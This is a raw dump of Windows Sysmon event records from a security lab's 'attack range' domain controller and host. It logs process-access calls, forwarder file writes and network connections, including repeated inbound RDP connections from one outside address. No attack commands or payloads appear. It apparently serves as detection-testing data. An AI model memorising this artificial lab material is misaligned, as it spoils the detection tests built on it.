11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:08.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52887AC94CBA262B252B76B2546FD8A5,SHA256=BA68B11BAD6B8338D42DAB24AEF65982E93876CC8D639BBE634C9125A8BC8999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:08.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C3AE8433B9E9F2620439C87F958BE98,SHA256=82E5E720979F9CC9ECA15F839E6E0CF485FDF0DDE4F2B66C3D501850657C6817,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:06.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:09.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=048DD6D44ADEBF2A6FB818B413BC5C4E,SHA256=7F60CEEE9DFAFF8DC2DA82BAED6DAAE6C347AAD3F13BB6C577B740CC1017EC8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:09.583{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8D60709545E9E9AD1CF7B7F201B17D,SHA256=6BF3B476526D80FAEA7D21B31BF2FAA96C8E8C06FCCAC614FD990A9DAFDFDB5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:10.775{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21B8BBB9A334ABFE2BF91B3778AA6F2,SHA256=06FF3AAD47D8599EE24F9328874B68B2A49B7B8D8959687211B912C626A2B7A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:10.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=477ECB888E9E75B57B4DC6485CD69250,SHA256=D648E3299012609B908641507D8D06EEAA90212F5720D5D9EFDE3F50E7A0EEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:10.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0FF71F0FD5FE7641AB7CF738E8BAF0A1,SHA256=E73FD93BD7FE12EFF89E058155D8868E317D32804656F22A246252EF3842653E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:10.725{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C57CD526246B09432070C17377D58E6D,SHA256=B6760834678D477BC4EB246872FFAA9A9C1475F209538DCDEDFEB5E8482A7E3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:08.548{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51522-false10.0.1.12-8000- 354300x8000000000000000219486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:08.348{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx64630-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:11.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45FDA2334C4102E292C8E28E730E59E,SHA256=46D7E3B025A26F8449D090A4418B8CCC220082C13C6EEA3107A98C1EB7FFB4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:11.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C84DB77C775D0BC81DF9E52447A41071,SHA256=9A6A930BE9F7BA4183723AA23EACC0A87062B78DABE3ED92933D4EBE1463D071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:11.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFE6F4A2B299A7F51D3F810F55634580,SHA256=EC7A60F71A4A054BE9B9C5D5E6B3A4F887BC10606FA37F3D70E5734EF66C7C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:12.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57AAC745A364013FAF0B2E3551EC168E,SHA256=C11686C7E692020B132DC3C08C5CF63B591CACDC2C03F703EDC01E39162D9A4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:12.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93D0861AF0C876E279D58361200023BB,SHA256=FE7E363D19CCE819FE827B7B5E1E67B2007F9F53F48DB5C86B035D6D7E7B314A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:13.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E9D770CD598E4146012756E7C8E8C66,SHA256=551BA6EFDE391D02DA30A8F2CB278EEFF533920CEC933B2D0D1442BF2A8F6E15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:13.807{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=478AC04982573192E8BA809CEA5E80CE,SHA256=89C04D43C0CD0E6440AF3D7BBE5D57F8BBD78E32B38693DCA13ED897433A13A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:11.650{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49226-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:14.973{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE10BD7B711A87622148F0249E5910FA,SHA256=64420E3D80E012852C4CC78950CAF618670FFC161E02C133B132B8533ECE64D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:14.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28817724350C3F2E462CAE47A30DA75,SHA256=35CA6650DD31D30CB12D533A65FA94EBF08F9B6022BCAC17D65F9A67F098EC87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:14.708{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADDB7AF4CE3EC0D20063C7A24884E9C2,SHA256=BABE7D5371FF73A8643BA66EA2C9B865B962C0B74F1A47DF9D68E93404A8B319,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:11.553{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx64560-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:15.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD4078E63184E04965E00A6798A431F4,SHA256=42E49FB0BA833404FB7F962CEA494D6C2496B37DFA04453FAF0E8AB804A029BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:16.870{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C35B334C2BE1C36FC37528F0E9FB2EA,SHA256=A5EA8C14B96F68D72CB658602E0315AF243F55BED400B6DF92FC802CF845DC65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:13.703{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51523-false10.0.1.12-8000- 23542300x8000000000000000219496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:16.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46223BF74EC6B3410AB532166DE78188,SHA256=39A80383F43CA67147854148BA38E605309128C897A6BF731D92532EF1561336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:17.885{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89601408B34621F9C94ADEF948FFFC84,SHA256=765724D9B1B1475D4825419DAD889971CD604D89C89892D495D75D334724FF63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:17.333{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A65CA15EE24F503A3C42971C401157D7,SHA256=E980B88E8D1D2FC11E1E7AEFF9DA7FF1B2C3A906BD732201C847A39532345A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:18.915{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6948B0F1EA013B35B002C288BA9B259D,SHA256=FC72C37839B5D37F47075040764B476C2FF20013B879D7B5A0529419F5BE5128,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:16.727{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:18.848{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED17A694CDC6261A1EAE571656B579ED,SHA256=FB1CF99E7C4BA0E102D5F0417958606A1520F7352B8AE7A6A3BC53238FA0E118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:18.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE84A3AA51D83AE3DA911421223BA002,SHA256=2D583C94B43A813FD49127BF46D9A30B4DA3E106C6E20153E006C59439879DF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:15.782{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54565-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000295383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.937{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-152B-6216-BE06-000000003802}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.937{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD4718BB057B5E6A053944C7BD0925C,SHA256=357FEEB367532BA435C9C46C47EAC243F2793F566375D170DF4CD2B1A99665AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.937{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-152B-6216-BE06-000000003802}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.934{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 